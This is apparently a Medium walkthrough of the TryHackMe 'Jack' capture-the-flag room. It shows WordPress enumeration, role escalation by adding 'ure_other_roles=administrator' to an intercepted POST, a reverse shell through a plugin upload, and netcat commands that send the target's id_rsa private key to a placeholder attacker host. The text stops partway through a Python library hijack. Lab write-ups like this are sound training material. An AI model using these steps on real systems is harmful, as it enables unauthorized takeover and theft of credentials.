TryHackMe — Jack — Walkthrough

INTRODUCTION

ENUMERATION

  • ap = All Plugins
  • at = All Themes
  • u = Enumerate Users
  • Detection-Mode = Since we’re not worried about being detected we can use aggressive mode which occasionally delivers more results at the cost of generating more noise.

EXPLOITATION

  1. Log into Wordpress using obtained credentials
  2. Select “Profile”
  3. Start Burpsuite or http proxy of choice and start capturing web traffic
  4. Select “Update Profile”
  1. In Burpsuite take a look at the captured HTTP POST and add the following string at the end of the post “&ure_other_roles=administrator”
  1. Click “Forward” to submit the HTTP Request and refresh the Wordpress Admin page, now showing more admin options, including the “Plugins” Menu
  • start your netcat listener
  1. Select “Plugins” then “Add New”
  2. Select “Upload Plugin”
  3. Select “Browse”
  4. Select your Plugin zip file and “Install Now”
  5. Click “Activate Now” and check your listener
  6. Ta F@#$king Da!!!

PRIVILEGE ESCALATION

  1. On the attack machine start your netcat listener to receive the file “sudo nc -nlvp 443 > id_rsa”
  2. On the target send the file to the attack machine using netcat by issueing the following command “nc -nv <ATTACK IP> 443 < id_rsa”
  1. Assign the correct privileges to the ssh key using the following command “chmod 600 id_rsa”
  2. ssh -i id_rsa jack@<TARGET IP>
  1. On attack machine start a python web server using sudo python3 -m http.server 443
  2. On the target download the file to /tmp using wget http://<ATTACK IP>:443/pspy64 -O /tmp/pspy64
  3. chmod +x /tmp/pspy64
  4. /tmp/pspy64
  1. start your listener on the attack machine sudo nc -nlvp 443
  2. Edit the os.py file and add the following to the end of the file

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store